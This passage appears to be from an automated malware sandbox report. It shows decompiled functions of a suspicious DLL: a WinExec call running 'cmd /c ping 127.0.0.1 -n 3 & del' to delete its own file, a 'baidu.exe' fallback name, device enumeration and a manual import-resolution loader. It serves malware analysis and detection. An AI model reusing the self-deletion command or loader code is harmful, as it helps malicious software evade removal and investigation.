                                                                                                                                                • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                0x1001a269
                                                                                                                                                0x1001a27e
                                                                                                                                                0x1001a286
                                                                                                                                                0x1001a29b
                                                                                                                                                0x1001a2b1
                                                                                                                                                0x1001a2ca
                                                                                                                                                0x1001a2db
                                                                                                                                                0x1001a2e4

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                • API String ID: 2874319085-10483710
                                                                                                                                                • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);
					E10001A90( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                0x1001a600
                                                                                                                                                0x1001a600
                                                                                                                                                0x1001a603
                                                                                                                                                0x1001a605
                                                                                                                                                0x1001a610
                                                                                                                                                0x1001a611
                                                                                                                                                0x1001a61e
                                                                                                                                                0x1001a630
                                                                                                                                                0x1001a635
                                                                                                                                                0x1001a63c
                                                                                                                                                0x1001a651
                                                                                                                                                0x1001a667
                                                                                                                                                0x1001a674
                                                                                                                                                0x1001a67c
                                                                                                                                                0x1001a67f
                                                                                                                                                0x1001a685
                                                                                                                                                0x1001a688
                                                                                                                                                0x1001a68b
                                                                                                                                                0x1001a68e
                                                                                                                                                0x1001a691
                                                                                                                                                0x1001a695
                                                                                                                                                0x1001a6a5
                                                                                                                                                0x1001a6b9
                                                                                                                                                0x1001a6bc
                                                                                                                                                0x1001a6c0
                                                                                                                                                0x1001a6c9
                                                                                                                                                0x1001a6d6
                                                                                                                                                0x1001a6de
                                                                                                                                                0x1001a6df
                                                                                                                                                0x1001a6e4
                                                                                                                                                0x1001a6ea
                                                                                                                                                0x1001a6ef
                                                                                                                                                0x1001a6f1
                                                                                                                                                0x1001a6fb
                                                                                                                                                0x1001a6fb
                                                                                                                                                0x1001a707
                                                                                                                                                0x1001a715
                                                                                                                                                0x1001a71b
                                                                                                                                                0x1001a725
                                                                                                                                                0x1001a730
                                                                                                                                                0x1001a73a

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001A651
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                  • Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID: .exe$baidu.exe
                                                                                                                                                • API String ID: 3164538923-2273953317
                                                                                                                                                • Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                • Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019960, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 33%
                                                                                                                                                			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E10003170( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF20(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF20(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380); // executed
						_t85 = E10019780(_t116, _t182); // executed
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380); // executed
						_t88 = E10019780(_t116, _t183); // executed
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380); // executed
						_t91 = E10019780(_t116, _t184); // executed
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380); // executed
						_t94 = E10019780(_t116, _t185); // executed
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380); // executed
						_t97 = E10019780(_t116, _t186); // executed
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
				}
				E100031A0(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003280( &_v1368); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}




















































                                                                                                                                                0x10019960
                                                                                                                                                0x10019971
                                                                                                                                                0x10019978
                                                                                                                                                0x10019980
                                                                                                                                                0x10019990
                                                                                                                                                0x10019995
                                                                                                                                                0x1001999c
                                                                                                                                                0x100199a6
                                                                                                                                                0x100199ad
                                                                                                                                                0x100199bf
                                                                                                                                                0x100199c5
                                                                                                                                                0x100199d2
                                                                                                                                                0x100199e0
                                                                                                                                                0x100199e5
                                                                                                                                                0x100199e8
                                                                                                                                                0x100199ef
                                                                                                                                                0x100199f3
                                                                                                                                                0x100199fa
                                                                                                                                                0x10019a01
                                                                                                                                                0x10019a09
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10019a1d
                                                                                                                                                0x10019a2b
                                                                                                                                                0x10019a2f
                                                                                                                                                0x10019a30
                                                                                                                                                0x10019a32
                                                                                                                                                0x10019a3a
                                                                                                                                                0x10019a3f
                                                                                                                                                0x10019a3f
                                                                                                                                                0x10019a47
                                                                                                                                                0x10019a48
                                                                                                                                                0x10019a4d
                                                                                                                                                0x10019a50
                                                                                                                                                0x10019a52
                                                                                                                                                0x10019a66
                                                                                                                                                0x10019a71
                                                                                                                                                0x10019a72
                                                                                                                                                0x10019a77
                                                                                                                                                0x10019a77
                                                                                                                                                0x10019a80
                                                                                                                                                0x10019a84
                                                                                                                                                0x10019a85
                                                                                                                                                0x10019a87
                                                                                                                                                0x10019a8f
                                                                                                                                                0x10019a94
                                                                                                                                                0x10019a94
                                                                                                                                                0x10019a9c
                                                                                                                                                0x10019a9d
                                                                                                                                                0x10019aa2
                                                                                                                                                0x10019aa5
                                                                                                                                                0x10019aa7
                                                                                                                                                0x10019abb
                                                                                                                                                0x10019ac6
                                                                                                                                                0x10019ac7
                                                                                                                                                0x10019acc
                                                                                                                                                0x10019acc
                                                                                                                                                0x10019ad5
                                                                                                                                                0x10019ad9
                                                                                                                                                0x10019ada
                                                                                                                                                0x10019adc
                                                                                                                                                0x10019ae4
                                                                                                                                                0x10019ae9
                                                                                                                                                0x10019ae9
                                                                                                                                                0x10019af1
                                                                                                                                                0x10019af2
                                                                                                                                                0x10019af7
                                                                                                                                                0x10019afa
                                                                                                                                                0x10019afc
                                                                                                                                                0x10019b10
                                                                                                                                                0x10019b1b
                                                                                                                                                0x10019b1c
                                                                                                                                                0x10019b21
                                                                                                                                                0x10019b21
                                                                                                                                                0x10019b2a
                                                                                                                                                0x10019b2e
                                                                                                                                                0x10019b2f
                                                                                                                                                0x10019b31
                                                                                                                                                0x10019b39
                                                                                                                                                0x10019b3e
                                                                                                                                                0x10019b3e
                                                                                                                                                0x10019b46
                                                                                                                                                0x10019b47
                                                                                                                                                0x10019b4c
                                                                                                                                                0x10019b4f
                                                                                                                                                0x10019b51
                                                                                                                                                0x10019b65
                                                                                                                                                0x10019b70
                                                                                                                                                0x10019b71
                                                                                                                                                0x10019b76
                                                                                                                                                0x10019b76
                                                                                                                                                0x10019b7f
                                                                                                                                                0x10019b83
                                                                                                                                                0x10019b84
                                                                                                                                                0x10019b86
                                                                                                                                                0x10019b8e
                                                                                                                                                0x10019b93
                                                                                                                                                0x10019b93
                                                                                                                                                0x10019b9b
                                                                                                                                                0x10019b9c
                                                                                                                                                0x10019ba1
                                                                                                                                                0x10019ba4
                                                                                                                                                0x10019ba6
                                                                                                                                                0x10019bba
                                                                                                                                                0x10019bc5
                                                                                                                                                0x10019bc6
                                                                                                                                                0x10019bcb
                                                                                                                                                0x10019bcb
                                                                                                                                                0x10019bd7
                                                                                                                                                0x10019bea
                                                                                                                                                0x10019bea
                                                                                                                                                0x10019bfb
                                                                                                                                                0x10019bfb
                                                                                                                                                0x10019c0b
                                                                                                                                                0x10019c16
                                                                                                                                                0x10019c16
                                                                                                                                                0x10019c19
                                                                                                                                                0x10019c1f
                                                                                                                                                0x10019c2c
                                                                                                                                                0x10019c37
                                                                                                                                                0x10019c43

                                                                                                                                                APIs
                                                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                • _memset.LIBCMT ref: 100199E0
                                                                                                                                                • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                  • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                  • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                  • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                  • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3323326763-0
                                                                                                                                                • Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                • Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001AB60, Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                			E1001AB60(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}




























                                                                                                                                                0x1001ab69
                                                                                                                                                0x1001ab6c
                                                                                                                                                0x1001ab6f
                                                                                                                                                0x1001ab80
                                                                                                                                                0x1001ab8a
                                                                                                                                                0x1001ab9e
                                                                                                                                                0x1001abac
                                                                                                                                                0x1001abb2
                                                                                                                                                0x1001abb8
                                                                                                                                                0x1001abba
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abc0
                                                                                                                                                0x1001abc3
                                                                                                                                                0x1001abc7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abd0
                                                                                                                                                0x1001abe1
                                                                                                                                                0x1001abe4
                                                                                                                                                0x1001abe6
                                                                                                                                                0x1001abe9
                                                                                                                                                0x1001abec
                                                                                                                                                0x1001abf0
                                                                                                                                                0x1001ac09
                                                                                                                                                0x1001ac13
                                                                                                                                                0x1001ac17
                                                                                                                                                0x1001ac1a
                                                                                                                                                0x1001ac1b
                                                                                                                                                0x1001ac20
                                                                                                                                                0x1001ac23
                                                                                                                                                0x1001ac26
                                                                                                                                                0x1001ac2a
                                                                                                                                                0x1001ac5c
                                                                                                                                                0x1001ac62
                                                                                                                                                0x1001ac68
                                                                                                                                                0x1001ac6e
                                                                                                                                                0x1001ac74
                                                                                                                                                0x1001ac7d
                                                                                                                                                0x1001ac83
                                                                                                                                                0x1001ac86
                                                                                                                                                0x1001acaa
                                                                                                                                                0x1001acb3
                                                                                                                                                0x1001acb3
                                                                                                                                                0x1001acb6
                                                                                                                                                0x1001ac88
                                                                                                                                                0x1001ac90
                                                                                                                                                0x1001ac9c
                                                                                                                                                0x1001ac9c
                                                                                                                                                0x1001accd
                                                                                                                                                0x1001acd0
                                                                                                                                                0x1001acd3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001acda
                                                                                                                                                0x1001ace0
                                                                                                                                                0x1001ad12
                                                                                                                                                0x1001ad18
                                                                                                                                                0x1001ad1f
                                                                                                                                                0x1001ad1f
                                                                                                                                                0x1001ad2a
                                                                                                                                                0x1001ad2d
                                                                                                                                                0x1001ad2f
                                                                                                                                                0x1001ad35
                                                                                                                                                0x1001ace2
                                                                                                                                                0x1001ace5
                                                                                                                                                0x1001acfb
                                                                                                                                                0x1001acfe
                                                                                                                                                0x1001ad00
                                                                                                                                                0x1001ad06
                                                                                                                                                0x1001ad06
                                                                                                                                                0x1001ad3a
                                                                                                                                                0x1001ad3d
                                                                                                                                                0x1001acc1
                                                                                                                                                0x1001acc7
                                                                                                                                                0x1001acc7
                                                                                                                                                0x1001acca
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3d
                                                                                                                                                0x1001ad4d
                                                                                                                                                0x1001ad51
                                                                                                                                                0x1001aba6
                                                                                                                                                0x1001aba6
                                                                                                                                                0x1001aba9
                                                                                                                                                0x00000000
                                                                                                                                                0x1001aba9
                                                                                                                                                0x1001ad56
                                                                                                                                                0x1001ad61
                                                                                                                                                0x1001ad64
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x1001ac2f
                                                                                                                                                0x1001ac3a
                                                                                                                                                0x1001ac3d
                                                                                                                                                0x1001ac44
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x1001abf4
                                                                                                                                                0x1001abfa
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abfa
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad78
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
